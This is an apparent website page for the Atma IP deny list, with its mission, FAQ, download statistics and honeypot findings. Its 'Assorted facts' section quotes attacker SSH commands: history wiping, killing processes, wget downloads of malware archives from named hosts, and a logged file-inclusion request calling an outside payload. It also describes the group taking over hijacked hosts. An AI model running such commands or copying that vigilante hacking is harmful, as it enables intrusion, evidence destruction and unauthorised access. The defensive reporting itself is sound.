Ex.1 Ex.2

 Separador

Mission 

We identify, gather and clasify dangerous IP addresses such as:

An updated list is published each 3-4 days, ready to be used with any blocking program. All you need to do is adding it to your favourite program by using one of the URLs below:

(*) Perhaps not avaliable from some countries, banned IPs or their closest neighbours.

Special thanks to those who have lately helped us by reporting errors in the list: "thajsta", "frisco.chico", "imvgilante2000", "yoshigoto95", "borjanogueiras", "rautamiekka", "gate.wizard", "meistersinger", "fakhir" and "marc.kuehrer".



Documentation 

How-to English & SpanishEspañol/Castellano e Inglés

PDF document  Peerguardian 2 for Windows     PDF document  IPlist/IPblock 0.26 for Linux

Peerblock: just add a new list and paste http://list.iblocklist.com/lists/atma/atma

 

FAQ

How can I use the blacklist/atma deny list?

Most blocking programs come with a few pre-configured lists. Unfortunately, blacklist/atma is not in that number as far as we know. Thus, you need to configure your blocking program (see above, "how-tos"). While being an easy task in every case, there are no universal instructions valid for all of them. Our list is published in Peerguardian 1 format, which is compatible with nearly all existant programs and human readable "as is". If you are not using a blocking program yet, please go to the downloads section.

Concerning the terms of use, feel free to use it for any purpose as long as you keep the notice in its header (comments in the first lines of the list) or giving credit in any other fair way instead. If in doubt, please contact us.

Why should I use this list when my program of choice already comes with some others preconfigured?

Mainly for a reason alone: we do believe that we identify a good deal of them not listed anywhere else before. This is how we try to do it::

  1. We identify most dangerous IPs with our own tools which are not based in any other. They are supposed to be harder to avoid cause attackers don't know how they work, even if they know about their existance at all. More, they can't know where we are lurking because we use dynamic IPs from different ISPs. In other words, when a threat is detected, the attacker will find its IP published within some days but we will have changed ours before, so there will be no use for them in reviewing hundreds of logs or warning other attackers.
  2. We are spanish language speakers and we use that language for almost everything we do: websites, mailing, programming... Most attackers either are native english speakers or have very good skills in that language, but it is not very likely that they could understand spanish. That's why they might be detected by us without even knowing how and where it happened.
  3. As for now, we are a small group. If we intend to harvest a large number of attacks we just can not sit and wait for them to appear. Thus, we don't use passive detections but try to attract as many attacks as possible instead (obviously, we can't explain in detail how we do it).

Should I use this list alone or along with some others?

For one thing, the more lists you use, the harder to handle for your computer, which could be a problem if your hardware is old. On the other hand, despite we add IPs from other sources, it is always safer to block them from several lists, perhaps updated more often than Atma, being larger or more specialized. Since Atma is a multipurpose list, we do believe that it is suitable for most home and even professional users, specially those using P2P and/or running any kind of server. For your information, its contents as for March of 2010 were as shown:

Threat: IPs/ranges: Threat: IPs/ranges:
Spammer
Malware
Unspecified Threat
SSH Attack
SMTP Port 25 Attack
P2P Malware
P2P Corrupted Packets
Several Threats
Threat For SQL Servers
Port Scan Attack 		20667
14846
10979
5348
4183
2704
2388
1577
688
554 		Proxy Seeker
Threat For Web Servers
Telnet Attack
MS-Terminal Attack
FTP Attack
P2P Unrequested Responses
VNC Attack
Others

Single IPs blocked:
 476
471
234
191
173
112
68
38

88125

Bear in mind that we don't list IPs:

If you want to block any of them, you definitevely need extra lists.

How does an IP/range get delisted?

All IPs get deleted within 2-5 months, depending on a number of items like the kind of threat and the historical behaviour. Of course, we remove false positives as soon as we get to know about them. As of June of 2010, entries had been in the list since:

IPs/ranges added within: IPs/ranges:
Current month (June)
1-2 months ago (May)
2-3 months ago (April)
3-4 months ago (March)		 40261
21420
21101
213

Will I get rid of antivirus, anty-spyware and firewalls?

Not at all. Using a blocking program along with our list or any other just prevents your computer to contact with some others. That's all. For instance, you still can get your computer infected by sharing a memory card or by opening an infected email, even if delivered by a trustworthy ISP.

Despite already using the Atma list, I am still receiving spam.

Spammers' IPs are targeted by us and included in the list, indeed, and for one reason: those who send spam are very likely to pose some other threats, notably for administrators of servers, forum, blogsm etc. We will never list IPs belonging to the most important providers, like Gmail, Hotmail, Yahoo, etc. Unfortunately, most spam come from accounts of those companies. If you are not satisfied with their own filters and you are using a mail manager, you could try installing a filter in your computer.

Is atma/blacklist a widely used list?

We guess not at all until February of 2010 but we had no other reliable data than those of one of the mirrors. As a orientative fact, the list had been downloaded more than 5000 times from there in january of 2010. However, currently is avaliable at iblocklist.com which is, perhaps, the most important mirror for blocking lists.

Do you hack?

No, we don't. Nevertheless, we took over a few hijacked hosts for a number of reasons:
* A top agressive and resilient one in that moment.
* Risk of alerting the bad guys prior to the true administrator.
* Big chances of gathering the controllers' IPs and other data about them.

Those were: a Truetel's host in Taiwan (2009), another one belonging to a tasmanian fireguard patrol (2010), an online shop in Poland (2011) and several corporate servers (2011) in Spain (still online, see why and further info in spanish).

Currently (Oct. 2011) we spotted the infamous 58.218.199.227, 58.218.199.147 and 58.218.199.250 from China (although the whole subnet has been active in the recent past and even other IPs like 222.208.183.218 seem to be related to those scans). It is useless to complain or warn someone, since they are not hijacked. We do not expect to see them offline but, if we succeed, they will be much less active than they used to be until September 2011. Should you want to help us, please drop us a line.

Also, we have been greeting :) the MediaDefender guys at 208.86.198.xxx for a week in Nov. 2011 until the 22th.

What do the descriptions mean?

When using a blocking program you will see different kinds of alerts. Those provided from our list fall into three main categories:

Note this: each attack goes towards a specific target, but that doesn't mean that the attacker would refuse to take advantage of unexpected vulneravilities. Same here about operative systems: you could see an "SSH attack" alert and think "well, I'm running Windows, which does not use that stuff, so I'm safe". Wrong. We are saying to you that we have detected a SSH attack from that IP but it is very likey they could run other kinds of attacks.

Some items represent quite benign actions, such as port scans or pinging. On the contrary, those labeled as "Several threats" are the most dangerous.


Assorted facts

 Some SSH attacks:

Gathering information

w
uptime
id
ls -a
uname -a
cat /proc/cpuifno
ps x
wget
curl -O

After a previous succesful login

rm -rf .bash_history
history -c
w
ps x
ls -a

Attempting to get rid of the honeypot

bash
sh
kill -9 -1
reboot
exit 		  Sending malware to the target

uname -a
passwd
wget http://nasa.undernet.nm.ru/udp.tgz
tar zxvf udp.tgz

Other deliveries came from

dragutrau.clan.su/Trade/army.tar.gz
freewebtown.com/hotzu/py/ryo.tar
prigat.ucoz.com/mangalia.tgz

Attackers don't want us to see what they do

unset HISTFILE HISTSAVE HISTLOG WATCH
HISTFILE=/dev/null

Attempting to run malware

cd /dev/shm
su

Dumb DoS or speed test?

wget http://download.microsoft.com/download/win ... /W2Ksp3.exe

 Some flashy detections:

Statistics of blocking programs downloading blacklist/atma during the first week of December o2009:

Downloads
760
253
112
43
14
7
4
4
2
1

Total
916
253
14
11
 Program/Version
PeerBlock/1.0.0.181
PeerGuardian/2.0
PeerBlock/1.0.0.202
PeerBlock/1.0.0.223
BlockControl/1.6.9
PeerBlock/0.9.2.86
IPblock/0.18
IPblock/0.27
IPblock/0.26
PeerBlock/1.0.0.187

Program
PeerBlock
PeerGuardian
BlockControl
IPblock

Chart Agents/Versions

 During September of 2009 attackers tried to login under 10374 different user names. The most attacked were:

9850
1034
690
431
264
224
208
206
195
190
 root
admin
test
oracle
user
guest
robert
mysql
michael
paul 		  190
177
176
176
168
166
162
154
152
148
 info
postgres
amanda
adam
sales
martin
backup
student
ftpuser
suporte 		  132
130
130
130
126
126
124
120
115
114
 testing
nagios
eric
david
web
tester
john
richard
sarah
sam 		  114
110
107
106
104
102
101
100
100
100
 patrick
bruce
matt
mark
cyrus
teste
marc
webmaster
mail
download

    Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David" (a common name in both languages).

Bad boys never sleep:

2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20.859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:

Jul 7 19:27:42 (not shown) sshd[28641]: Accepted password for (not shown) from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 (not shown) sshd[12823]: Accepted password for (not shown) from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 (not shown) sshd[8048]: Accepted password for (not shown) from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 (not shown) sshd[28775]: Accepted password for (not shown) from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 (not shown) sshd[31450]: Accepted password for (not shown) from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 (not shown) sshd[8496]: Accepted password for (not shown) from 188.24.255.242 port 30856 ssh2

Wierd ways of figthting cybercrime:

Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET //poll//booth.php?include_path=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment :D


Where on earth are the Honeypots?

After reading the "Cyber Crime Alert" report by the FBI (spring of 2011) it seems that bad guys think that here, in Spain, we run an incredible 69 per cent of the Honeypots in the World and, besides, they use to share the IPs where honeypots are supposed to be. Well, concerning our own IPs, wether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other Honeypot here apart from ours.

A boo for a couple image-hosting places

In sept. 2011 our site suffered a persistent attack from 62.129.242.122, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we got to know that those indonesians were using a few image-sharing sites for their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.

Why does Nokia want to know my email password?

Did you know that when you use the Nokia's email app, you are giving them your address and password, as seen in this blog?. In Nov. 2011 we checked it out by ourselves using a Nokia X3-02 and a gMail account:
Account's activity


Get involved 

1-Use and spread our list

Help us and help others letting them to know about us. You could link us from your blog or website, tell your contacts about atma.es... On the other hand, since downloads are steadily increasing, we would like to have the list (it is only 2-3 MB) mirrored in some more sites. If you are willing to setup one, please contact us.

2-Sending your logs to us

We have developed some automathic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Reporting assosrted IPs/ranges

If you know how to identify them in a particular context you could report them to us.

4-Run a "honey pot"

You can think of a "honey pot " as a disguise that can turn your local net or computer into an absolutely different thing when seen from an attacker's point of view. Installing a basic one can be quite effective while easy to set up. If you need a little help, here we are!

5-Warn us about false positives, changed IPs, etc.

Sometimes we may be wrong and add some innocent IP to the list. But that is not the only one issue we have to face; for instance, we need to remove old entries when they have turned safe, to exchange lots of info, to deal with lots of emails... We will always welcome your help.

6-Special request for english speakers

This page in english is a draft yet. We would like you to help us by warning us about typos, wrong expressions and so.


Links 

MS Windows Blocking programs for Microsoft Windows

PeerBlock   PeerGuardian   ProtoWall (not open source)   OutPost Pro (not free)   BeeThink IP blocker (not free)

Linux Blocking programs for Linux

IPBlock/IPList   MoBlock   PeerGuardian   NfBlock    EisFair-BFB

Linux Blocking programs for Mac-OS

PeerGuardian

If you know about any other not listed here, please tell us.

Linux Third part sources

In our list we add the newest threats detected by other trustworthy sources to whom we are in debt:

Amos.TwilightParadox.com    Antispam.Andreotti.nl*    Antivirus.neu.edu.cn    Autoshun.org*    Bizimbal.com    Blackip.ustc.edu.cn    Blocklist.de    Boston.comites-it.org    BotHunter.net    Cert.ntnu.edu.tw    Charles.the-haleys.org    CheekyFreebies.com    Check.Torproject.org    Chriskujawski.com    Clean-mx.de*    Cyber-ta.org    Cs.Rutgers.edu    c64.gotdns.org    Daiwa-comp.co.jp    Danger.rulez.sk    Darrenpopham.com    DnsBL.Abuse.ch*    Doetut.xs4all.nl*    Dougnichols.org    Dynastop.tanaya.net    Dr-data.net    Elfagr.net    Escrow-fraud.com    Elite-proxies.blogspot.com    Elizabeth.czn.cz    EmergingThreats.net    Forum.emule-project.net    Emule-security.net    Esdevagrafica.com.br    EvilDayStar.net    FantasyForeverCreations.com    Files.sabmx.net    ForumPostersUnion.com    FreeHairSecrets.com    Fugitif.DynDns.org    Furniture.co.ua    GabyyHackerTeam    Galf.org    Gamble-Irwin-Group.com    Genendesign.com    Gw.Paraibuna.com.br    Hackedreport.com    Heise.de    Iantighe.com    IPillion.com    Jainvestigation.com    JayScott.co.uk    Juniper.net    Kish-telecom.com    Mail.HogarDeCristo.org.ec    Malc0de.com    MaliciousNetworks.org*    MalwareDomainList.com* MalwarePatrol.net    MalwareURL.com    MarSolucionesFinancieras.com    Meganfath.com    Merlot.com    Mtc.sri.com    MyIPtest.com    MyWot.com/wiki    NeilGunton.com    Nethavoc.net    NetSecDB.de    Noamu.com    Outten.co.uk    Paradoxi.exisoft.nl    Pellegrinilab.org    PrairieHomeOutfitters.com    Progressiverehabmuskego.com    ProjectHoneyPot.org*    ProSouthRealty.com    Puaga.com    Rblhu.net*    RootKitKiller.com    Rynearson.com    Sans.org*    Sblam.com    SB-innovation.de    SecurityNewsPortal.com    Senderbase.org    Semeliker.net    Shinshu.fm    Slyparadox.com    Snortattack.org    Spam-ip.com    sshBL.org*    Stats.denyhosts.net    StopForumSpam.com    Sudosecure.net    Tcc.edu.tw    Thalamus.no-ip.com    TheHackedReport.com    Threatexpert.com    Trustedsource.org    Twitter.com/bannedIPs    Twitter.com/hashza    Twitter.com/HoneyPoint*    Twitter.com/olaf_j*    Uceprotect.net    Unusualdischarge.com    Ustc.edu.cn    VillagePlayers.org    VirtualSupplyNet.com    Vitapatent.com    Websworld.org    Xml.SsdSandBox.net    192.192.205.93   

Note: when you perform a IP/range query, results may include not a generic label but some of the sources labelled with * instead.

Please, note that that we select IPs following our own criteria rather than automatically adding every single one from every single source. That's why you could find IPs that are listed in some of them but missing in the Atma deny list.


Contact 

Visit our Google group (spanish only) or send us an email.

 Separador

© 2008-2011 Atma.es | Privacy | Legal notice | Original logo from Ocal | Valid HTML and CSS | Web of Trust record | Designed by Expressmedia.es